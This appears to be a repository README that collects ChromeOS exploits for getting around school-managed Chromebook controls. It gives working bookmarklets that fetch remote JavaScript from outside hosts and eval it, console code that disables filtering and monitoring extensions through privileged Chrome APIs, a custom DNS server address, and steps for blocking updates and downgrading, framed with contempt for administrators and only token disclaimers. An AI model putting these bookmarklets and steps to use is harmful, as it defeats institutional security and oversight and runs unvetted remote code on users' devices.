This is a curated list of exploits for ChromeOS. It started with LTBEEF, and now there is more! Many of these exploits can destory your computer if used inproperly. So PLEASE PLEASE make sure you follow these instructions very carefully! If you need help ask it here
ATTENTION ALL SYS ADMINS!!!
Hello, I am Echo and I created this repo in order to give exploits for the masses and to prove one thing, chromebooks are literal trash, and a poor excuse for a computer. They are full of exploits, you might think you blocked/patched them all but then 3 more pop up. It is a endless game of wack-a-mole. Treat your students to a windows computer, they will thank you. And don't you dare start to think "My school district does not have that kind of money", it most likely does! How much are you paying the blocker companies? Think about that.
Image Credit: LittleMissNyanExtension Launcher (Bookmarklet)
A bookmarklet capable of installing extensions, for those without a allowlist.Steps: Go to here bookmark the code there (Might make a dns) go to chrome.google.com/webstorex and use the bookmarklet, then put the icon of the extension, the id, and name of it (Doesn't matter just put anything) press download, and it will work. Extra Notes
- Credit to "Aka, but nice" on discord.
- Dns will be up soon, if bookmarklets are blocked
- This will not work if you have a blocklist this is only for if when you go to the webstore it shows blocked
New Point-Blank (Run scripts on extension pages)
This exploit allows you to run scripts, on extensions pages, this is a great example of how Chromebooks are a piece of garbage.Scroll down to preform this exploit!
Getting started (Note: if bookmarklets are blocked your screwed.)
- Go to here (on your school chromebook of course)
- Make a bookmark with the code there.
- Once that is done. If you have Securly go to here if it says blocked by chrome, reload(you have to actually have securly ofc) If you have iBoss go to here,
If you have Cisco Umbrella go to here If you have Blocksi go to here And if you have GoGuardian(might not work) go to here. Now most of these links are a block page(this is intentional) on each page should have a blue link, click the link on the page if it opens a blank page click the bookmarklet that you just made and click either hard disable or soft disable, you can also run some of the scripts and run your own code, your extension may disable javascript being ran on it, so running your own code may not work. Extra notes
- I recommend doing soft disable, which only disables it until restart.
- The launcher was made by me, but the idea was from Bypassi#7037
- If your school updated GoGuardian, this exploit may not work.
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
UBoss
By the BlueHatCrew https://dsc.gg/blue-hat-crew
This works only for iBoss, and Blocksi. If you don't have one of these, use New Point Blank, that is listed above. First go to https://tinyurl.com/byeswamp if you have iBoss. https://tinyurl.com/blockboss if you have Blocksi. Then bookmark the code below
javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
Then go to the site with your blocker that was listed above.
And run the code. Follow the instructions there. If it doesnt work let us know by creating a discussion.
This was made in partnership with Aka, but nice#5094 and Bypassi#7037.
-Cubing Hay
CAUB (Prevent Updates)
This exploit keeps your chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your chromebook that the wifi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.Scroll down to preform this exploit!
Getting started
- Go to
chrome://network#state
(on your school chromebook of course; if this is blocked then ur kinda screwed lol). - Scroll to the bottom of the page; you should see a list of "favorite" wifis that you've connected to in the past.
- Click the + sign next to the wifi name of each network that you commonly connect your chromebook to.
- The more wifis you expand, the better, but note that they have to come from the "favorites" section.
- Use ctrl+a and ctrl+c to copy all the text on the entire network#state page.
- Go to caub.glitch.me.
- Paste the copied text into the textbox bshelow.
- Press the "generate onc" button below the textbox.
- Once you have downloaded the file, go to chrome://network#general
- Click on the "import onc" button
- Import the newly downloaded file
Extra notes
- Your chromebook will no longer automatically update. (as long as you are on a wifi that you used caub on)
- Be careful not to stay on a wifi for too long without using caub on it, otherwise you might update.
- We cannot guarantee that this will work on every wifi
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
LTBEEF (Disable extensions)
LTBEEF is an exploit, created by Bypassi#7037, which abuses api endpoints within the google chrome webstore.Please Note: This exploit only works on versions below 106, and eariler versions of 102
The original site created for this exploit can be found at ltbeef.netlify.app
Installation
There are several vesions of this exploit you can use, here are the 2 most common versions:
-
Bookmarklets
To use a GUI, bookmark one of the below scripts:- Ingot
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
- Compact Cow's UI
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
- Compact Cow's UI (Dark)
javascript:void fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(d=>d.text()).then(eval);
Navigate to https://chrome.google.com/webstorex and click on that bookmark. Flip the switches on the extentions you want to disable. Simple!
-
DNS servers
By changing your DNS server, you can use LTBEEF, even if bookmarklets are blocked.First, go to Settings > Network > Wifi > Network, and click on "Custom Name Servers"
Set every box there to the following ip:
158.101.114.159
(Hosted by The Greatest Giant#0110)
Navigate to https://chrome.google.com/webstorex and click on that bookmark. Flip the switches on the extentions you want to disable.
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
LTBEEF inspect (Using inspect to disable extensions)
The screenshot below was preformed on 108.0.5359.75 (Official Build) (64-bit) on the stable channel.
This has been tested and does work but has varying levels of success, you will need access to inspect element, more specifically, console.
- Open this URL on your chromebook:
chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/manifest.json
Shortened link: https://tinyurl.com/i-ltbeef - Open inspect and navigate to the console tab.
- Run the basic LTBEEF code such as
chrome.management.setEnabled('extensionid', false)
Replacing extensionid
with the ID of the extension you want to disable, e.g. the stuff after the = in the URL bar when you click the extension's "details" button in chrome://extensions
Credit to SprinkzMC#8421 (aka Bypassi) for finding this!
To re-enable just go to the chrome web listing for the extension and click on the banner.
Point Blank (Run code on system pages)
Point Blank is an exploit that allows you to run bookmarklets on privilaged pages, sutch as the chrome extentions page. This exploit was also found by Bypassi, you can read more about how he discovered this exploit You can either use the prompt or the gui the prompt is below 1. Bookmark this code:javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
And the gui is in launcher.js
2. Navigate to chrome://extensions
3. Click on a extension that YOU installed from the Chrome Web Store > Details
4. In the URL bar, copy the string of letters and numbers after the /?id=
5. Click "View in Chrome Web Store" and spam the excape key. If it loads into chrome webstore try again, if it is a blank screen click the bookmarklet
5. Paste the id of the extension into the prompt or input box seperated by commas.
If you close the tab, the exploit will stop working.
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
SH1mmer
SH1mmer is an exploit devloped by the crew at Mercury Workshop. Credits can be found within the menu and on their site.Further information is now located at these links:
Official Repository
Official Website (INSTRUCTIONS)
Raw Shims Download
Wax4Web Shim Builder
Downgrading (Change versions)
Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, sutch as LTBEEF. This is a built in feature of ChromeOS.Requirements
- A USB thumb drive with at least 4gb of storage, some board have small or bigger images, so have a beef usb, I recommend 16gb
- A personal computer with access to downloading extentions
- A brain
Setup
- Navigate to chrome://version on the chromebook you with to downgrade and check for your board under "Platform" (ex I have a c3100 and it's board is stable-channel octopus)
Instlation
- Install Chromebook Recovery Utility onto your personal computer (found at https://chrome.google.com/webstore/detail/chromebook-recovery-utili/pocpnlppkickgojjlmhdmidojbmbodfm?hl=en
- Open the extention, and click on the settings button in to top right hand corner, click "use local image"
- Select the recovery image you downloaded from chrome100
- Plug in the USB you wish to use, and follow the prompts on the screen
- On your chromebook, press esc+reload+power and follow the prompts
- On the checking for updates screen, press ctrl+shift+e to skip the "checking for updates" screen
- Profit
Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
Killcurly
Kill extension, by signing out.- Visit chrome://settings/signOut the O in Out must be capital.
- Press the blue button
- Go to chrome://restart
- Now visit tinyurl.com/AddSession
- Add your SCHOOL account back. It WILL NOT WORK if you add a home account back. This is just so you can still access Google Drive, Youtube, and any Google service.
- All extensions should stop working.
- Note that you have to repeat this every time you restart or sign out.
Using this, may get your computer taken away if your school finds out. This was discoverered by zoroark Please use this only when you have permisson, I (3kh0) do not condone the use of this exploit for illegal purposes!
boop